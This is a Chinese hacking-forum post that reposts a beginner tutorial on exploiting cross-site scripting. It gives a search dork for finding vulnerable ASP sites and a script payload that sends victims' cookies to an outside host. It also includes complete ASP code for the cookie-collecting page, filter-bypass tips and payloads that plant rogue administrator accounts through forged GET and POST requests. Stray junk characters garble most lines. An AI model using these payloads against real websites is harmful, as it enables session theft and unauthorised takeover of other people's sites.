前天贴吧一位朋友发了个后台XSS利用的帖子,大家就一起讨论了讨论,原帖为: 0 a" a8 W9 l u3 {$ d& z0 ^
. y" t+ a: c0 F, G) {9 O/ D
http://tieba.baidu.com/f?kz=10690072392 W+ S) Y8 D: |. q, f+ G
0 _% Y; H9 P( r& T这个帖子说的只是一个思路,不是很详细,并且说的是利用后台XSS挂马的情况,但是其实在后台挂马一般是不会牵扯到XSS的,只是一个过滤不过滤转换不转换的问题,比如很多带编辑器的后台,都是不过滤不转换在文章中的html代码的,比如eweb,你可以直接编辑发表文章的时候的html代码,这就为挂马、盗cookie提供了很多机会。
5 H/ R( y, W( f+ B" \! t" e' J9 I
但是,我想说的是,即使是挂马、盗cookie,也是不会使用location这种手法的,因为这样太明显了,一般都是使用普通挂马的手法的,比如iframe、JS等等。
. u) b$ n8 g& n& H5 O: t- B3 f) y t1 G9 F# O3 ]+ z! U7 A
我在上边的帖子中说作者讲的不是很详细,希望出一个详细点的利用教程,于是今天又一位朋友就发了一个详细些的文章,我这里就发大博客里,让更多需要的朋友看到这篇文章。, e) k5 @% y0 T% V+ b4 g
l& U# |- R8 J6 ~7 l6 q* i0 J
这个文章是对XSS的一个很简单的利用,原理很简单,主要用于科普,只是想让朋友们知道,XSS并不是简单的弹个框框玩那么简单的,是有很多利用价值的,在国外,XSS已经被列为网站杀手之一,包括国内的很多大站,大家都把心思放到了防范SQL注入上,相应的对XSS的防范就很少,这也是XSS总是能成功的原因之一。* Z' m/ S7 S- n+ @8 \( i; |
/ U0 [2 |+ Q. G! p* I
好了,废话不多说了,一起来看文章吧。/ z+ w' Q2 Y' i4 [! W Z- U0 ~
7 Q/ \5 t. b! t4 \8 W9 ]7 l0 L8 Z" }-------------------------------------------------------------------! o# o3 Y5 N6 g8 L- X J# K6 l
% s, Z0 }3 u0 b8 @ t
首先要找到一个有XXS的站,这里就不整什么大站了,谷歌一下inurl:'Product.asp?BigClassName',搜出来的命中率也比较高。随便找一个,先<script>alert('xxs')</script>一下。呵呵,框框出来了。
5 @. A4 d( F6 @+ N: s
3 f, {/ X) \: B3 Y7 x9 I: \
' _- `+ t& K3 D! S. H1 F( h6 f6 a9 ?4 B( J
再看看自己的Cookie吧,把alert里面的内容换成document.cookie就可以了,如图:1 a' O3 @( E; _
/ M* a* k; O. R+ c7 }* s
5 Q8 }6 R8 D" k" U& C% g
& }! v" I l h' i+ G这里就是要把弹出来框框里的东西收集到我们的记事本里。这里,要玩这个步骤就需要一个你自己的站点,具体思路就是( F' u* y- q3 L! p* ?6 N* o* f4 N" k
1:让目标访问已跨站的网址,然后这个网址执行脚本
; G, T7 V8 \: O* |2:然后跳转到你已经写好专门用来收集Cookie的网址
# @; i1 f t% Z1 e* z
7 W2 s9 h8 Z% z具体实现方法:. c3 i# M; J, Q1 F: [
先构造语句<script>window.open('http://dlgyi.rrvv.net/cookie.asp?msg='+document.cookie)</script># s- C- B( [& Q
这句话意思是打开一个新的窗口,访问http://dlgyi.rrvv.net/cookie.asp这个网址,并且通过msg传递一个变量,这里的变量就是我们要收集的cookie了。* ~' ? A9 U2 ~) X \+ i( i# M
9 {$ ?# L" n! }$ }- P这里需要自己写一个页面,也就是收集对方发过来cookie的页面,代码是这样的:4 P, t0 I z# q/ K8 T) B4 F3 i
3 F' L% T1 q# ]. z# @
<html>/ k% B1 O6 @# D! n" C
<title>xx</title>8 b9 P! ]4 V9 ]4 E1 E5 o; X" s+ D8 G
<body>/ Y, h% b' F% u4 _+ }
<%# ]4 M; O3 y9 g# U5 p
testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中
2 g9 M) ~- n( y' n1 @msg = Request("msg") //获取提交过来的msg变量,也就是cookie值2 ?5 }' J; x! T. i' m* W
set fs = server.CreateObject("scripting.filesystemobject")创建一个fs对象
8 Z! u- B! w& f1 d6 Dset thisfile = fs.OpenTextFile(testfile,8,True,0)5 x+ X4 q& i, [" @: Q
thisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie
% h% ]! Q5 t8 L" f8 Uthisfile.close //关闭 m# H* K& d0 o( f
set fs = nothing2 n+ y* M+ i' K+ i2 p, ~. L9 r7 M5 {
%>
" r% q2 Z( H- Q</body>
# N+ z6 A& A/ c& E4 ?- t</html>
0 o) F: r! C& A% Z( g; g" ]7 N+ g2 G" E) [
然后保存,放在你自己服务器上,如果有人点击构造好的XXS页面,就会自动在你网站的根目录生成一个文本:" F/ b0 z9 r. X& n8 G5 P; M! C
8 q3 i4 O& V3 s: @1 a
7 B- A2 I3 h1 u1 I. S
- `7 ]0 B4 _- ]2 Z) j/ r
4 M1 Z1 G0 t4 ?8 V; T' |1 G3 t拿出来看看,呵呵,Cookie到手:# X8 i$ X' s+ y
/ b% g- A; m& X7 R1 s; N
/ a0 Y/ @4 n+ D% C- {, O" n F6 f
+ ?2 |9 x+ J, H! {本文只是抛砖引玉,而且没有多大的实战价值,一来很多网站都过滤掉了+号这个字符连接符,二来稍大点的站,也不会存在如此的XXS,本文旨在给新手一个练习的向导,毕竟不可能谁一开始学习就可以RI掉大站,从小站开始练手,一起进步。话说咱也是新手O(∩_∩)O~' j: v3 l+ ^& @1 u
3 g7 o% @# Y! d2 L" b5 u
PS:一点小提示,如果提交<script>alert('xxs')</script>网站没有反应时,不要立刻就点X。你可以鼠标右击,查看一下网站的源码,看看网站到底过滤掉了什么字符,通过编码啊神马的发挥下智慧,绕过过滤。只要出现小框框,咱就胜利了。
, w$ {$ H6 p; _6 ]- m R T* i \
: {* m3 v* X0 I0 Y: R-------------------------------------------------------------------$ a1 ]% P- `3 f" S
: u; [5 ], M: Z9 P. V! \( K& ~下面是我对这个帖子的回复,也一起贴过来吧:
7 j1 J' H( ^9 D5 {7 @% E. B; Q" d/ v- X- e$ O
说实话,像这种后台XSS其实作用不大的,一般的小站你拿到cookie也没什么利用价值,大点的站的话,或许可以用cookie盗点装备什么的,但那牵扯的多了,不过对于普通脚本小子来说,日站的时候除非毫无办法了还会想到XSS的,不过日站时候的XSS利用方法跟这篇文章里讲的差不多的,可以借鉴一下。
& K# @3 H, q( @% L7 y9 ^
3 m$ l6 b& ]; p j9 r" f但是,这里的文章讲的是针对已经进入后台、拿shell无望又想多获得点东西的情况,说它鸡肋的原因是,你知道的,现在大部分站都是cookie+session的,并且一般用户名和密码不会直接放到cookie里了,这是它鸡肋的原因。. ?! S3 b/ \, L; u! Y
再者,日站的时候盗cookie一般是想进后台,但是如果遇到网上有源码的情况的话,还可以进一步利用,比如添加个管理员什么的。
# a P X0 i# j* ~3 q; B e3 b8 @
9 B) `3 o: d: j; }. C) e! }在文章的最后,顺便贴上一般XSS的利用思路,也不是原创,原文链接:6 H6 Z4 ]) O' H g" A8 T1 t6 h2 K
% \* c: D0 ^* _2 U5 ~
http://user.qzone.qq.com/673116767/blog/1252452536
1 E; h0 ^ c1 }3 P- F4 i j! J
* K5 |/ }% b$ n2 c一般发现一个xss漏洞后要做的基本上就是这些:3 n5 X1 h: S- O. _( M
( \$ M4 ^* z. A' `/ [1. 伪造请求 使用$_REQUEST或$_GET- C. s5 w% J# W" u. M) a" v
% w# Z. |6 g$ \+ c, v1 \( p首先我们要找找该网站使用的程序是不是在网上能找到源码,如果能找到源码的话,就去分析后台管理员更改密码或者增加管理员的页面,然后分析管理员使用的是不是$_REQUEST接收参数,如果是的话,我们使用该XSS漏洞构造一个请求,比如前台发表留言中可以使用HTML代码,那么我们就嵌入一个IMG元素:
, z& o' l' w9 G<img src="/admin/admin_add.asp?name=xxx&psd=yyy" />5 c, |7 \3 L% U# s/ \6 q- A
当管理员登录管理后台后看到包含img的页面的时候,就伪造了一个增加后台管理员的请求,而该请求是由管理员发出的,所以顺利的增加了一个新的管理员。* U# Z5 |2 d9 S5 c& W6 U
6 V; B% H" A$ ^& N如果是可视文本编辑器,可以尝试使用输入:
5 {, B% d ~# u) G2 Ohttp://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy')
# C' E" K, Z: r9 }4 G1 d这样最终会构造出:# \3 J- F$ O5 l1 e
<img src="http://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy',0,0)" />
& T4 w# S7 m' z [3 M' ~总之要举一反三。
8 s2 ?6 b1 X& c x* Z: V
6 G& d0 p0 y" R. l+ L; |, ]/ E2. 伪造请求 使用$_POST
; Q# d4 G# n9 ^. a k7 K" N5 ?# |$ Y( ~* N4 g9 H% W- O. L
当后台接收增加管理员或更改管理密码的变量时使用的是$_POST方式,那么第一种方法无效,我们视情况而定,如果没有过滤<script>,我们可以通过ajax方式来伪造请求,如:
2 x* Q! [" K# m<sc/*xss*/ript type="text/javascript">
4 l, w4 ?9 @, }6 }9 J6 avar aj = new ActiveXObject("MSXML2.XMLHTTP.3.0");
; O$ w* [- Q% [) e* K2 jaj.open("POST", "/admin/admin_add.asp", false);
1 y( R2 }" Y9 M& Y* T' d# w1 V7 A( H1 Nvar postdata = 'name=xxx&psd=yyy';
! v. |' y# K2 U: Taj.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); ' h" X i2 V# @; C1 |6 V% r: g
aj.send(postdata);
5 \( Z2 f4 }; w& O3 }8 v</scr/*xss*/ipt>
! _) o8 g# n4 ]9 n1 v* T+ M1 c0 X/*xss*/是HTML注释,用来绕过简单的对script代码块的过滤。
' O& t3 p& `$ U& C2 V6 U
; ?$ V$ a4 H" j& I C0 ?3. 跨站伪造请求 使用$_GET 或 $_REQUEST# q( H/ x6 X# U; w+ K/ j1 z
) z7 \: a) X# q0 x- A2 q# S与第一种伪造请求的方式相似,但是第一种伪造请求是利用站内的xss漏洞进行的,而跨站伪造请求,是站外发起的,比如我在我的博客的首页放了这样一个图片5 c5 ?" o0 G2 Q/ f
<img src="http://www.drvfan.com/admin/admin_add.asp?user=xxx&psd=yyy"/>7 m( v" L) j; U% r0 i) u- e
然后我跑到dvbbs上发帖子,“勾引”动网论坛的管理员来我的博客,如果动网论坛的管理员已经登录了他的管理后台,然后使用共享进程的浏览器(目前基于ie内核的myie,maxton等等还有firefox都是共享进程的)来访问我的博客,那么他的后台就会被加入一个用户。
5 ~4 Z& ~ j- S" ?* Y9 J, ~6 n9 g2 D G& ^2 B
4.跨站伪造请求 使用$_POST(0day)
( v# G% W% k" g. S# i0 Q( V+ R$ ^- B" ?: e+ _$ I' R: o$ p; h
如果入侵目标的管理后台使用的是$_POST方式来接受变量,那么我们无法在我们的网站跨站使用ajax的post方式提交数据过去,因为ajax是无法跨域的。9 o+ l5 E2 M4 P2 ]
! D4 `8 n5 e, b( Y
但是我们可以在我们的网站放一个form,里面填写好数据,form的action为要利用的有漏洞的页面,然后当有人打开该页面的时候,我们就用js控制该form进行submit,ajax虽然不能跨域,但向域之外的地址提交form总是可以的。2 D6 W+ P) x9 L( [# b
8 F* w% @8 L. ]
总之,第3,4种方法成功几率要小一些,因为我们要想办法让已经登录自身后台的管理员,使用共享session的浏览器访问我们的伪造请求的页面,有一点社会工程学的技术含量。% u- b6 Q e9 e7 _/ N7 O0 v
8 x# z. W: X4 |* h( o% E' h
OK,该说的都说完了,Over。
8 a) R/ b1 t9 I; i, L |
发表于 2012-9-13 17:08:58
收藏
支持
反对